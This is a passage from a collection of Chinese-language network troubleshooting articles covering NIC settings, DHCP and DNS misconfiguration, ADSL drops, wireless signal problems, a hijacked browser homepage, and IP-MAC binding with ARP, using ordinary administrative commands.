    一旦获取 DHCP 地址之后，即可使用工具 ping 一台局域网外的设备。这可确认 DHCP 服务器的指定配置是否正确以及网络流量是否被正确地路由发送。这时，网络连接已经过测试，因此计算机可重新连接到网络。对于持续性网络连接问题，最好在计算机和网络之间在线连接工具以进行附加的诊断。

    第 5 步：检验速度/双工模式设置

    某些链路性能故障如双工模式不匹配、速度不匹配以及静态配置 IP 地址等都只能进行在线检测。因此，我们强烈推荐使用具有在线检测功能的工具。在计算机和网络之间以在线方式连接工具。确认所连接交换机端口的速度设置和双工模式设置与相应计算机的设置相符。如果检测到双工模式不匹配，则确认计算机和交换机端口是否均已被设成自动协议。

    第 6 步：网络流量监控

    通过在线工具检查计算机是否成功地向 DHCP 服务器申请并接收到地址。这种工具应能同网络建立独立的连接，然后再与计算机建立连接。接着，使用计算机连接到电子邮件服务器或应用服务器，并通过工具监控网络流量。查找过多的广播、冲突或错误。一旦检验完所有这些参数之后，计算机与网络之间的链路即可取消。如果故障仍然存在，则可能需要使用更加精密的网络诊断工具。


如何快速排除网络故障

《一键清理系统垃圾》

如何快速排除网络故障

一、故障时首先检查网卡

    局域网中网络不通的现象是比较多的。一旦遇到类似问题，首先应该认真检查各连入设备的网卡设置是否正常。可检查有无中断号及I/O地址冲突（最好将各台机器的中断设为相同）。当网络适配器的属性中出现“该设备运转正常”，并且在“网络邻居”中能找到自己，说明网卡的配置是正确的。

    二、确认网线和网络设备工作正常

    网卡没有问题时，通过“网上邻居”来看看网络中的其他电脑。如果不通，则可能是由于网络连线中断而产生问题，可使用测线仪来检测一下线路是否断裂，然后用替代法来测试一下网络设备质量。如果网线和网卡本身没有问题，就需要考虑是否是软件设置方面的原因。

    三、检查驱动程序是否完好

    若全部硬件没有问题，再检查驱动程序本身是否损坏、安装是否正确。如果也是正常的，设备没有冲突，但还是不能连入网络，可尝试重装网络适配器。

    四、正确对网卡进行设置

    查看是否有设备资源冲突，有时候冲突并没有提示。可能的设备资源冲突有：

    1、NE2000兼容网卡和COM2都使用IRQ3产生冲突。

    解决办法：可以在设置窗口中将COM2屏蔽，并强行将网卡中断设为3。

    2、PCI Ethernet网卡（如Realtek RTL8029芯片的PCI网卡）和显示卡都使用IRQ10产生冲突。

    解决办法：我们可以采用不分配IRQ给显示卡的办法解决冲突问题，即：将CMOS中的“Assign IRQ for VGA”设置为“Disable”。


八大方法巧妙排除网络连接故障

《一键清理系统垃圾》

八大方法巧妙排除网络连接故障

  【导读】导致网络不通的原因实在太多，但是作为网络管理者也不必为此而失去解决问题的勇气，只要我们将故障现象进行规类，还是有规律可循的。

    搭建一个网络是相对比较轻松的事情，但是要想管理好网络却是一件比较繁琐的工作。且不说用户给你提出的各种要求会让你忙个不停，单单网络不通这一故障解决起来就够麻烦的，因为导致网络不通的原因实在太多。但是作为网络管理者也不必为此而失去解决问题的勇气，只要我们将故障现象进行规类，还是有规律可循的。

    一、连接指示灯不亮

    观察网卡后侧RJ45一边有两个指示灯。它们分别为连接状态指示灯和信号传输指示灯，其中正常状态下连接状态指示灯呈绿色并且长亮，信号指示灯呈红色，正常应该不停的闪烁。如果我们发现连接指示灯，也就是绿灯不亮，那么表示网卡连接到HUB或交换机之间的连接有故障。对此可以使用测试仪进行分段排除，如果从交换机到网卡之间是通过多个模块互连的，那么可以使用二分法进行快速定位。而一般情况下这种故障发生多半是网线没有接牢、使用了劣质水晶头等原因。而且故障点大多是连接的两端有问题，例如交换机的端口处和连接计算机的网卡处的接头，借助测试仪可以很轻松的就以找出故障进行解决。

    二、信号指示灯不亮

    如果信号指示灯不亮，那么则说明没有信号进行传输，但可以肯定的是线路之间是正常的。那么不防使用替换法将连接计算机的网线换到另外一台计算机上试试，或者使用测试仪检查是否有信号传送，如果有信号传送那么则是本地网卡的问题。在实际的工作经验证明网卡导致没有信息传送是比较普遍的故障。对此可以首先检查一下网卡安装是否正常、IP设置是否错误，可以尝试Ping一下本机的IP地址，如果能够Ping通则说明网卡没有太大问题。如果不通，则可以尝试重新安装网卡驱动来解决，另外对于一些使用了集成网卡或质量不高的网卡，容易出现不稳定的现象，即所有设置都正确，但网络却不通。对此可以将网卡禁用，然后再重新启用的方法，也会起到意想不到的效果。

    三、降速使用

    很多网卡都是使用10M/100M自适应网卡，虽然网卡的默认设置是“自适应”，但是受交换机速度或网线的制作方法影响，可能出现一些不匹配的情况。这个时候不防试试把网卡速度直接设为10M。其方法是右击“本地连接”打开其属性窗口，在“常规”选项卡中单击“配置”按钮，将打开的网卡属性窗口切换到“高级”选项卡，在“属性”列表中选中“Link Speed/Duplex Mode”，在右侧的“值”下拉菜单中选择“10 Full Mode”，依次单击“确定”按钮保存设置。

    四、防火墙导致网络不通

    在局域网中为了保障安全，很多朋友都安装了一些防火墙。这样很容易造成一些“假”故障，例如Ping不通但是却可以访问对方的计算机，不能够上网却可以使用QQ等。判断是否是防火墙导致的故障很简单，你只需要将防火墙暂时关闭，然后再检查故障是否存在。而出现这种故障的原因也很简单，例如用户初次使用IE访问某个网站时，防火墙会询问是否允许该程序访问网络，一些用户因为不小心点了不允许这样以后都会延用这样的设置，自然导致网络不通了。比较彻底的解决办法是在防火墙中去除这个限制。例如笔者使用的是金山网镖，那么则可以打开其窗口，切换到“应用规则”标签，然后在其中找到关于Internet Explorer项，单击“允许”即可。

    五、整个网络奇怪的不通

    在实际的故障解决过程中，对于一些较大型的网络还容易出现整个网络不通的奇怪故障。说它奇怪，是因为所有的现象看起来都正常，指示灯、配置都经过检查了，任何问题都没有，但网络就是不通；而且更另人叫绝的是在不通的过程中偶尔还能有一两台计算机能够间隙性的访问。其实这就是典型的网络风暴现象，多发生在一些大中型网络中。既网络中存在着很多病毒，然后彼此之间进行流窜相互感染，由于网络中的计算机比较多，这样数据的传输量很大，直接就占领了端口，使正常的数据也无法传输。对于这种由病毒引发的网络风暴解决的最直接的办法就是找出风暴的源头，这时只需要在网络中的一台计算机上安装一个防火墙，例如金山网镖，启用防火墙后你就会发现防火墙不停的报警，打开后可以在“安全状态”标签的安全日志中看到防火墙拦截来自同一个IP地址的病毒攻击，这时你只要根据IP地址找出是哪一台计算机，将其与网络断开进行病毒查杀，一般即可解决问题。

    小提示：作为网络管理员，即使在正常情况下也有必要安装金山网镖这样的防火墙，找出网络中流串的病毒源头，作出预防，避免危害进一步的扩大。 但是要避免网络风暴最佳的办法还是划分子网和安装网络版杀毒软件。划分子网，这样每个子网内的计算机比较少，这样病毒即使相互传播，产生的数据量也不大，不会危及整个网络，而安装网络版杀毒软件则可以保持整个网络高速畅通的运转。

    六、配置错误导致网络不通

    这种故障的外部表现多是网络指示灯正常，也能够Ping通，有时可以访问内网资源，但无法访问外网资源，有时还会表现出访问网站时只能通过IP地址，而不能通过域名访问。这就是典型的网络配置不当所产生的，即没有设置正确的网卡和DNS。如果网关设置错误，那么该台计算机只能在局域网内部访问，如果DNS设置错误，那么访问外部网站时不能进行解析。对此我们只需要打开本地连接的属性窗口，打开“Internet协议（TCP/IP）”属性窗口，然后设置正确的默认网关和DNS服务器地址即可。

    七、网上邻居无法访问

    网络是畅通的，与Interne或局域网内部的连接全部正常，但是通过网上邻居访问局域网其它计算机时却无法访问的症状。造成这种故障的原因比较多，笔者在这里可以给大家提供一个简单的解决办法。即直接在“运行”窗口中按照“\\计算机名（IP地址）\共享名”的格式来访问网内其它计算机上的共享文件夹，这样不仅可以绕开这个故障，而且也比通过网上邻居访问要更加快捷。

    八、组策略导致网络不通

    这种故障主要存在于Windows 2000/XP/2003系统之间，是因为组策略设置了禁止从网络访问。因此我们可以在“运行”窗口中输入“Gpedit.msc”并回车，在打开的组策略窗口中依次选择“本地计算机策略—计算机配置—Windows设置—安全设置—本地策略—用户权利指派”，然后双击右侧的“拒绝从网络访问这台计算机”，在打开的窗口中将里面的帐户列表选中并删除即可。

    网络不通是一个复杂多变的故障，但只要我们掌握其本质，了解网络构建的步骤，熟悉故障的易发点，这样就可以做到以不变应万变，轻松解决网络不通的问题。


IE浏览器自动关闭问题解决

《一键清理系统垃圾》

IE浏览器自动关闭问题解决

IE浏览器自动关闭问题解决

    故障现象： WINDOWS HOME版联想计算机，出现自动关闭IE窗口的现象，提示‘某内存地址错误，不可读'。据操作电脑的金女士介绍，打开IE浏览器，自动浏览默认主页 http://www.hao123.com 网址，点来点去就死机了，重新启动后出现此怪现象。

    故障分析： 检查发现，网络连接正常，每次打开IE窗口，几秒或者十几秒即被关闭，后来干脆没有任何错误提示了。打开文件夹窗口，随意操作，也被不定时关闭，似乎是 WINDOWS核心程序出了问题，或者是恶意脚本(程序)作怪。重新开机，进入安全模式，没有此怪现象，排除了系统文件被破坏的可能。难道中了木马或者恶意代码？检查发现已经关闭了IE下载功能，用对付木马和恶意网站的方法扫荡一翻，没有发现异常，使用论坛网友介绍的一招‘清除COOKIES'也没好转。

    深入分析： 换不同的帐号登录系统，故障依然，监视系统进程，意外发现：在IE等窗口自动关闭时，突然出现 Dwwin.exe进程，而且不止一个，有时有10个左右，然后又都突然消失。不要以为是病毒进程，Dwwin.exe是系统自带的侦测程序 Dr.Watson的执行程序，将先其停用再说：单击“开始→运行”并在打开的窗口中输入“regedit”，然后在注册表编辑器中展开以下分支：[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionAeDebug]，然后在右侧窗口中将“auto”的值改为0。重新开机，故障还是故障，看来这招治标不治本。

    问题解决： 再次询问操作人员，金女士是超级菜鸟，甚至不会输入网址，只是在窗口上点来点去，就死机了，确实问不出什么来。hao123.com是正规网站，不会有什么恶意病毒，能点击的地方也只有IE的工具栏和菜单了，想到这里，瞅了瞅旁边HP1000打印机，老老实实地在那里断电休息。也许、大概、可能是它惹的祸，加纸、加电，不出意外，连续打印出4张网页画面。回头急忙打开IE浏览器，点击、再点击，故障消失了。

    总结： 导致电脑故障的原因千差万别，而且不时来个张冠李戴的现象，换个思路也许会柳岸花明。本例中，导致IE等窗口自动关闭的原因是打印任务不能完成，而操作系统试图提示时遇到错误，如此反复。


网络应用不求人 故障及技巧集锦

《一键清理系统垃圾》

网络应用不求人 故障及技巧集锦

DNS代理故障

    读者KAIX:公司网络内有一台拨号服务和一台域管理服务器，在拨号时使用ping命令，总是发生丢包现象。取消DNS代理后，情况马上恢复正常。QQ连接使用正常，但网页打不开。请问，这可能是什么原因造成的?

    既然取消DNS代理后问题得以解决，估计是DNS代理或选择的DNS服务器有问题。实际上，不管使用何种代理服务器或防火墙，只要允许DNS端口通讯，就可以直接使用外网的DNS服务器，而无须使用DNS代理。另外，既然QQ可以连接，只是不能访问Web网站，说明Internet连接没有问题，而故障的原因，自然就是DNS解析故障。事实上，QQ可以直接指定服务器的IP地址，而无需经过DNS解析。

    上网导致死机

    读者风光:我的电脑是ADSL上网。不上网时工作正常。只要一上网，电脑很快就会死机。只能按Reset重启。电脑是TCL锐翔K3681。Modem是华为SmartAX MT800。系统是Windows XP，用星空极速2.0客户端，重装系统和网卡驱动也没用。应当如何解决?

    导致电脑死机有很多种原因。建议采用以下方法进行判断:

    第一，先让ADSL拨号连接到ISP，但不打开IE，也不运行QQ之类的Internet应用软件。如果能够稳定运行，而不会死机，说明Internet连接没有问题。
    第二，如果只要ADSL拨号就死机，说明是ADSL与计算机不兼容。可能是网卡或ADSL硬件故障，也有可能是PPPoE协议或驱动程序软件故障。可以采取的措施包括:
    * 卸载星空极速2.0客户端，使用Windows XP内置的ADSL拨号程序。
    * 将ADSL设置为路由方式，而不采用虚拟拨号方式。
    * 更换网卡插槽，或更换新的网卡。
    * 更换ADSL Modem。
    第三，如果在打开Internet Explorer并浏览网页时死机，说明是Internet Explorer或操作系统有问题，建议重新安装或修复系统。
    第四，也有可能是感染了蠕虫病毒，建议安装系统补丁和病毒防火墙。

    无法显示自定义表情

    读者ajksd:我的QQ在发送或接收自定义表情时会出现“卡机”现象，过几分钟后就好了。不过，自定义表情和图片对方仍然收不到，别人发过来的也打不开。将天网和Windows自带的防火墙关掉以后，再试仍然不行。可能是什么原因?应当如何解决?

    导致该故障的原因可能是Internet连接速度太慢，建议更换Internet接入方式或者Internet共享方式。当经过2级以上的代理服务器或宽带路由共享Internet连接时，将无法收到并显示图片。可以更换ADSL或小区宽带等宽带Internet接入方式，或者取消2级以上代理的连接共享方式，甚至试着直接拨号上网。如果问题解决，说明是上网方式的问题。

    被恶意网站修改主页

    读者diker:有一次通过搜索链接到了某个网站后，该网站就自动成了我的主页，连Internet选项中的主页项也变成了这个网站，并且灰化了。我用QQ聊天时，每次开始和人聊，就会现有这么一段话“你为什么要骂我?我哪里惹你了?我希望你对你的留言负责。你自己来给我解释，http://恶意网站的URL”。后来，采用手动修改注册表的方法，修改了HKEY_LOCAL_USER\Software\Microsoft\InternetExplorer\Main中的StartPage键值名(用来设置默认首页)，仍然无法解决。应当如何处理?

    导致该故障的原因是感染了脚本漏洞病毒，可以使用新版本的Symantec、KV2005来清除，或者借助3721的上网助手(http://www.3721.com)来解决。由于许多病毒都在自动运行键值中设置了注册表恢复，因此，仅仅修改上述键值是不够的，还必须查看并修改HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run项，删除不必要的应用程序。另外，建议将Internet Explorer升级至6.0+SP1，并且更新系统的补丁。需要注意的是，如果系统是Windows 98，一定要升级到Internet Explorer 6.0+SP1，如果系统是Windows 2000/XP，则一定要及时升级系统补丁。

    作为一个临时解决方案，可以用“记事本”程序修改c:\WINDOWS\system32\drivers\etc\hosts文件，在里面添加如下一行:

    127.0.0.1 恶意网站的URL

    或者把其中的127.0.0.1换为其他默认主页的IP地址。


轻松解决无线网络连接故障

《一键清理系统垃圾》

轻松解决无线网络连接故障

【简 介】无线网络设备的价格日趋平易近人，众多网虫纷纷告别网线的束缚，开始享受无线带来的无拘无束的快乐。但是，有些读者还是反映网络时常出现连接失败的情况。今天，我们就把一些无线连接故障的实例集中起来作个详细的分析并提供解决的方案。

    无线网络设备的价格日趋平易近人，众多网虫纷纷告别网线的束缚，开始享受无线带来的无拘无束的快乐。但是，有些读者还是反映网络时常出现连接失败的情况。今天，我们就把一些无线连接故障的实例集中起来作个详细的分析并提供解决的方案。

    无线技术常识

    无线局域网(WLAN)的工作频段一般在2.4GHz，属微波通讯的范畴。传输特点是直线型、可见型，即目视范围的通信联系方式。这就说明雨、雾、墙等障碍均能影响到微波的传输质量。所以，我们在使用无线技术时也应该考虑到这些特点，在适当的环境下搭建网络。

    无线通讯的距离与辐射功率、天线的方向性以及天线增益有关。常见的无线设备辐射输出功率在200mW以下，无线网卡的功率一般仅几十mW。目前的无线设备一般自带全向天线，全向天线电波以天线为轴，呈“面包圈”状向外辐射；定向天线具有极强的方向性，在小角度的辐射范围外是完全没有信号的；使用可拆卸天线的设备可以外接增益天线，可以在不增加天线辐射功率的情况下增加通讯距离。

    微波在线缆中传输的要求很高，信号在线缆、接口上的损耗超出人们的想象，普通线材不适合做天线信号的传输介质。

    无线网络常见通讯故障

    在多数情况下，无线设备连接故障是由于使用不当引起的。通常表现有连接困难、通讯速度慢、掉线等故障。其故障原因一般分为三个：

    环境因素：AP与网卡间的距离过长；AP与网卡间有障碍物影响，比如室内复杂环境，墙壁、家具影响。

    人为因素：工作在2.4GHz频段的微波设备，如微波炉；网络线缆、天线线缆接触故障；定向天线特性等影响。

    设备因素：如设备过热；缓存过小等。

    故障实例及分析解决

    例一 AP+PCI台式机无线网卡组合，300平方米办公室环境，AP位于独立单间机房内部，最远网卡通讯距离约30米，在AP的覆盖范围内。最远距离时网卡连接正常后（连接速率稳定在5.5Mbps~11Mbps间）固定AP位置。施工结束后发现有多个连接盲点。

    分析解决：盲点设备区域网卡安置在落地的台式机上，网卡与AP间有操作员、PC设备、办公桌柜用具以及机房墙壁阻隔导致通讯连接故障。考虑到室内无吊顶，AP无外接天线接口，所以不适合使用外接天线。在不增加成本，不破坏室内美观的条件下，可以把AP挂在机房墙壁外，并最大限度提高安装高度，调整好终端位置后就可解决有盲点的问题。

    例二 AP+AP桥接通讯组合，通讯距离约150米，两AP都在室内，无建筑阻隔，通讯速率最高2Mbps，经常发生连接失败的故障。

    分析解决：这样的距离基本接近AP桥接的最远距离，架设外接增益天线是最好的解决方案。考虑到成本因素，可以使用另一种方案：两AP安装至室外墙壁，利用两墙壁作为反射物增强前方辐射波。在AP与墙面间以铝塑板做盆状容器保护，既美观又解决了防水、防晒难题，还起到了很好的反射作用。处理后的连接速率最高达到11Mbps，掉线现象不会再出现。

    例三 AP+笔记本电脑无线网卡组合，直线通讯距离20米，终端处在地下室位置，AP位于与地下室建筑物呈直角的三楼，故障现象是连接时好时坏，连接速率在最高11Mbps至无信号之间波动。

    分析解决：通讯距离不长，但墙与地的隔离作用影响了通讯质量，环境移动物体（车辆）因素变化导致复杂折射/反射，信号强度变化巨大。我们可以采取以下方案稳定信号：增加网卡外置天线；调整AP天线角度使天线辐射角度垂直于地下室笔记本电脑网卡；在AP天线的后端增加反射铝塑板。这样处理后连接速率应该就能稳定起来。

    例四 AP+笔记本电脑无线网卡+PCI台式机无线网卡家用组合，这是一个典型的家用无线局域网应用。用户反映，即使网卡与AP同在一个房间之内，两机ADSL拨号（带路由功能）掉线现象也十分频繁。

    分析解决：试着使用USB或LAN连接路由器和PC机，如果发现拨号连接稳定，长时间工作不掉线，由此就可判断故障可能来自于无线设备。进行了改善AP电源质量、散热等多种尝试均未见明显效果，则判断掉线现象为AP缓存过小引起的。处理办法是更换AP或限制传输速率。考虑成本，使用限速方案。设置AP最高连接速率2Mbps后，故障明显减少，也基本满足两机同时上网需要。

    例五 某无线网络更换使用室外平板增益天线后，网络终端无信号。

    分析解决：正常情况下，使用外接增益天线后网络会增加连接距离，网络终端无信号，有可能是定向天线的方向性故障。调整方向、垂直角度后故障便会消失。
小知识：通常远距离连接的无线网络一般会选用增益很高、方向性很强的八木天线、栅格天线、抛面天线、背射天线。而某些平板天线经特殊设计后也具有很强方向性以及定向增益，这类天线的方向性在使用中容易被忽视。

    例六 外接天线使用一段时间后连接无信号。

    分析解决：天线使用一段时间后出现连接故障，常见原因是接口接触不良。检查接口是否做好防水处理，如果发生锈蚀的情况，可用玻璃胶做外部防水涂覆处理。另外，也有可能是被雷击的特殊情况，对于这种情况一般很难维修，应该即时更换设备。


Windows系统常见网络故障解决方法

《一键清理系统垃圾》

Windows系统常见网络故障解决方法

ADSL经常掉线怎么办？ADSL间断性地无法获得IP地址怎么办？上网正常但无法打开任何网页怎么办？看完本文，相信可以帮你解答这些问题。

    ADSL经常掉线

    我的ADSL自安装后基本上就没有正常过，不仅上网时经常掉线，而且速度还非常慢，让人不胜其烦。请问，可能是什么原因?应当如何解决?

    可能的故障原因有五个:

    第一，ADSL Modem或分离器故障。ADSL Modem或分离器的质量有问题，将造成频繁的掉线故障。建议借用一套能正常使用的设备，更换后再进行测试。

    第二，ADSL线路故障。住宅距离局方机房较远(通常应当小于3000米)，或线路附近有严重的干扰源，也会导致经常掉线。另外，在接线盒到ADSL Modem之间建议采用双绞线，即使采用平行线，也不应当超过5米。

    第三，室内电磁干扰。室内的电磁干扰比较严重(如无绳电话、空调、洗衣机、冰箱)，也可能导致通信故障，建议使ADSL Modem远离上述设备，并不与上述设备共用一条电源线。

    第四，网卡缺陷。网卡的质量有缺陷，或者驱动程序与操作系统的版本不匹配，也能导致频繁掉线。

    第五，PPPoE问题。这是系统中PPPoE软件安装不合理或软件兼容性不好引起的问题。一般来说，Windows XP建议使用系统本身提供的PPPoE协议和拨号程序。Windows 98/2000则可以安装Modem附送的PPPoE拨号程序。建议先安装系统安全补丁。

    除此之外，还应当确认ADSL Modem散热良好。

    ADSL间断性地无法获得IP地址

    操作系统为Windows XP，以ADSL方式接入Internet。刚安装的时候一切正常，然而，现在经常是每隔1天或几天，拨号的时候就提示:“无法获得IP地址，检查网线是否插好!”重启几次后又一切正常(有时要过很长时间)，怎么解决?

    ADSL有两种接入方式，即专线方式和虚拟拨号方式，而绝大多数用户采用的都是后者。虚拟拨号方式不仅便于局方按时计费，而且也便于节约有限的IP地址资源，即只有用户拨入时才会获得一个IP地址，断开连接时又自动释放。

    然而，IP地址池中的IP数量毕竟有限，当突发的用户数量较多时，IP地址将被分配殆尽，后面的用户再拨入时将无法获取IP地址，直至其他用户下线并释放出IP地址为止，所以，在Internet访问高峰时间，无法获取IP地址的问题将会更加突出。如确属该原因，不必重新启动计算机，只须稍过片刻重新拨号，即可获得IP地址。也就是说，如果过一会儿即可获取地址，故障原因自然就出自局方。

    另外，跳线水晶头松动也会导致连接时断时续的情况。因此，如果排除了局方原因，就应当检查以下各项内容:

    * 网线是否有问题，尤其是RJ-45头，与网卡的接触是否良好。
    * ADSL是否设置为“桥接(bridged)”方式。
    * 网卡及驱动程序是否有问题。
    * Windows XP操作系统是否有问题。

    上网正常但无法打开任何网页

    我有一台笔记本电脑，在单位通过局域网可以正常上网，回家后使用ADSL连接Internet就会出现问题。尽管电脑显示宽带连接正常，但却无法打开任何网页，无法实现Internet访问。ADSL Modem的所有LED指示灯显示正常。请问是什么原因?

    在单位通过局域网上网时，网卡设置的IP地址信息(IP地址、子网掩码、默认网关、DNS服务器IP地址)是单位局域网指定的。而在家中上网使用ADSL时，需要重新设置该网卡的IP地址信息。通常情况下，与ADSL Modem连接的网卡的IP地址信息应当设置为自动获取IP地址。

    也就是说，回到家后，应当将网卡的IP地址设置为“自动获得IP地址”，DNS设置为“自动获得DNS服务器地址”。然后，将该网卡连接至ADSL Modem，即可正常连接Internet了。

    IE总要检测代理服务器

    我的系统是Windows 2000，ADSL上网。前几天把Internet Explorer(简称IE)升到了6.0(原先是5.0)后，出现了一点问题，网还能上，但就是在打开IE的时候总要检测代理服务器设置，还非常慢，在以前没有出现过这种问题，不知什么原因?

    安装IE浏览器时，默认状态下，“局域网设置”中的“自动检测设置”复选框是被选中的。当打开IE浏览器时，IE将自动搜索局域网中的代理服务器设置，从而影响了IE访问Internet的速度。

    建议在IE浏览器的“工具”菜单中选择“Internet选项”，选择“连接”选项卡，单击“局域网设置”按钮，在“局域网(LAN)设置”对话框中取消对“自动检测设置”复选框的选中。单击“确定”按钮，保存所作的修改。


常见网络故障分析

《一键清理系统垃圾》

常见网络故障分析

1、QQ、MSN MESSENGER 能上，不能打开网页的故障分析。

    （1）DNS服务器设置错误：请检查网络连接中收选DNS和备用DNS设置是否正确。
    （2）TCP/IP协议出错：如果DNS设置无误但仍无法浏览网页，就应检查TCP/IP协议是否正确安装。如果重复安装两次拨号网络适配器或TCP/IP协议，就极可能造成无法浏览网页，请务必删除一个。如果要卸载并重新安装TCP/IP协议，请卸载后重新启动电脑，再重新安装。
    （3）如果是IE不能打开网页，而换用其他浏览器正常，则需要重新安装IE。

    2、能上网但PING 不通

    如果你PING指定的IP地址不通，但又不是 所有的都不通，这种现象可解释为：指定的IP地址设置了防PING规则（如安装防火墙）一般在不能上网时才使用PING测试，顺序一般是：ping 127.0.0.1->ping 自己 -->ping网关-->PING代理服务器-->ping dns 服务器，它是测试网络是否正常的一种铺助办法。

    3、上不了网处理方法

    第一步：首先进入命令行模式，通过ping 127.0.0.1 来判断TCP/IP协议是否正确安装，不通则重新安装设置。
    第二步：输入 IPCONFIG 获得本机IP 网关，通过PING 本机IP判断网卡是否有问题 如果不通 重新安装驱动．
    第三步：前两步已经判断工作正常，可查看线路问题还是出在远程服务器或路由器线路上 执行 PINF网关IP地址，如果不通则说明问题基本出在线路上，这个时可查看RJ45水晶头是否扭断和更换网线测试，如果通则说明从本机到服务器或路由器的远程连接正常，问题在电信方面，与本机无关。


局域网网络故障排除策略

《一键清理系统垃圾》

局域网网络故障排除策略

当我们组建好了一个小型网吧后，为了使网吧运转正常，网络维护就显得很重要了。由于网络协议和网络设备的复杂性，许多故障解决起来绝非像解决单机故障那么简单。网络故障的定位和排除，既需要长期的知识和经验积累，也需要一系列的软件和硬件工具，更需要你的智慧。因此，多学习各种最新的知识，是每个网络管理员都应该做到的。

    A、故障排除过程

    在开始动手排除故障之前，最好先准备一支笔和一个记事本，然后，将故障现象认真仔细记录下来。在观察和记录时一定注意细节，排除大型网络故障如此，一般十几台电脑的小型网络故障也如此，因为有时正是一些最小的细节使整个问题变得明朗化。

    1、识别故障现象

    作为管理员，在你排故障之前，也必须确切地知道网络上到底出了什么毛病，是不能共享资源，还是找不到另一台电脑，如此等等。知道出了什么问题并能够及时识别，是成功排除故障最重要的步骤。为了与故障现象进行对比，作为管理员你必须知道系统在正常情况下是怎样工作的，反之，你是不好对问题和故障进行定位的。

    识别故障现象时，应该向操作者询问以下几个问题：

    当被记录的故障现象发生时，正在运行什么进程(即操作者正在对电脑进行什么操作)。

    这个进程以前运行过吗？

    以前这个进程的运行是否成功？

    这个进程最后一次成功运行是什么时候？

    从那时起，哪些发生了改变？

    带着这些疑问来了解问题，才能对症下药排除故障。

    2、对故障现象进行详细描述

    当处理由操作员报告的问题时，对故障现象的详细描述显得尤为重要。如果仅凭他们的一面之词，有时还很难下结论，这时就需要管理员亲自操作一下刚才出错的程序，并注意出错信息。例如，在使用Web浏览器进行浏览时，无论键入哪个网站都返回“该页无法显示”之类的信息。使用ping命令时，无论ping哪个IP地址都显示超时连接信息等。诸如此类的出错消息会为缩小问题范围提供许多有价值的信息。对此在排除故障前，可以按以下步骤执行：

    收集有关故障现象的信息；

    对问题和故障现象进行详细描述；

    注意细节；

    把所有的问题都记下来；

    不要匆忙下结论。

    3、列举可能导致错误的原因

    作为网络管理员，则应当考虑，导致无法查看信息的原因可能有哪些，如网卡硬件故障、网络连接故障、网络设备(如集线器、交换机)故障、TCP/IP协议设置不当等等。

    注意：不要着急下结论，可以根据出错的可能性把这些原因按优先级别进行排序，一个个先后排除。

    4、缩小搜索范围

    对所有列出的可能导致错误的原因逐一进行测试，而且不要根据一次测试，就断定某一区域的网络是运行正常或是不正常。另外，也不要在自己认为已经确定了的第一个错误上停下来，应直到测试完为止。

    除了测试之外，网络管理员还要注意：千万不要忘记去看一看网卡、Hub、Modem、路由器面板上的LED指示灯。通常情况下，绿灯表示连接正常(Modem需要几个绿灯和红灯都要亮)，红灯表示连接故障，不亮表示无连接或线路不通。根据数据流量的大小，指示灯会时快时慢的闪烁。同时，不要忘记记录所有观察及测试的手段和结果。

    5、隔离错误

    经过你的一番折腾后，这时你基本上知道了故障的部位，对于电脑的错误，你可以开始检查该电脑网卡是否安装好、TCP/IP协议是否安装并设置正确、Web浏览器的连接设置是否得当等一切与已知故障现象有关的内容。然后剩下的事情就是排除故障了。

    注意：在开机箱时，不要忘记静电对电脑的危害，要正确拆卸电脑部件。

    6、故障分析

    处理完问题后，作为网络管理员，还必须搞清楚故障是如何发生的，是什么原因导致了故障的发生，以后如何避免类似故障的发生，拟定相应的对策，采取必要的措施，制定严格的规章制度。

    B、故障原因

    虽然故障原因多种多样，但总的来讲不外乎就是硬件问题和软件问题，说得再确切一些，这些问题就是网络连接性问题、配置文件选项问题及网络协议问题。

    1、网络连接性

    网络连接性是故障发生后首先应当考虑的原因。连通性的问题通常涉及到网卡、跳线、信息插座、网线、Hub、Modem等设备和通信介质。其中，任何一个设备的损坏，都会导致网络连接的中断。连通性通常可采用软件和硬件工具进行测试验证。例如，当某一台电脑不能浏览Web时，在网络管理员的脑子里产生的第一个想法就是网络连通性的问题。到底是不是呢？可以通过测试进行验证。看得到网上邻居吗？可以收发电子邮件吗？ping得到网络内的其他电脑吗？只要其中一项回答为“yes”，那就可以断定本机到Hub的连通性没有问题。当然，即使都回答“No”，也不就表明连通性肯定有问题，而是可能会有问题，因为如果电脑的网络协议的配置出现了问题也会导致上述现象的发生。另外，看一看网卡和Hub接口上的指示灯是否闪烁及闪烁是否正常也是个不坏的主意。

    排除了由于电脑网络协议配置不当而导致故障的可能后，就应该查看网卡和Hub的指示灯是否正常，测量网线是否畅通。

    2、配置文件和选项

    服务器、电脑都有配置选项，配置文件和配置选项设置不当，同样会导致网络故障。如服务器权限的设置不当，会导致资源无法共享的故障。电脑网卡配置不当，会导致无法连接的故障。当网络内所有的服务都无法实现时，应当检查Hub。


IP地址和硬件地址冲突的解决

《一键清理系统垃圾》

IP地址和硬件地址冲突的解决

在校园网络中，最方便的捣乱方法就是盗用别人的IP地址，被盗用IP地址的计算机不仅不能正常使用校园网络，而且还会频繁出现IP地址被占用的提示对话框，给校园网络安全和用户应用带来极大的隐患。捆绑IP地址和MAC地址就能有效地避免这种现象。

    何为MAC地址

    网卡在使用中有两类地址，一类是大家都熟悉的IP地址，另一类就是MAC地址，即网卡的物理地址，也称硬件地址或链路地址，这是网卡自身的惟一标识，就仿佛是我们的身份证一样，一般不能随意改变。它与网络无关，无论把这个网卡接入到网络的什么地方，MAC地址都是不变的。其长度为48位二进制数，由12个00 ~0FFH的16进制数组成，每个16进制数之间用"-"隔开，如"00-10-5C-AD-72-E3"。

    如何查找MAC地址

    1、在windows 9x/2000/XP下单击"开始/程序"，找到"MS-DOS方式"或"命令提示符"。
    2、在命令提示符下输入："Ipconfig/all"，回车后出现如附图所示的对话框，其中的"Physical Address"即是所查的MAC地址。

如何捆绑MAC地址和IP地址

    进入"MS-DOS方式"或"命令提示符"，在命令提示符下输入命令：ARP - s 10.88.56.72 00-10-5C-AD-72-E3，即可把MAC地址和IP地址捆绑在一起。
    这样，就不会出现IP地址被盗用而不能正常使用校园网络的情况（当然也就不会出现错误提示对话框），可以有效保证校园网络的安全和用户的应用。
    注意：ARP命令仅对局域网的上网代理服务器有用，而且是针对静态IP地址，如果采用Modem拨号上网或是动态IP地址就不起作用。ARP命令的各参数的功能如下：

    ARP -s -d -a

    -s：将相应的IP地址与物理地址的捆绑，如本文中的例子。
    -d：删除相应的IP地址与物理地址的捆绑。
    -a：通过查询ARP协议表显示IP地址和对应物理地址情况．


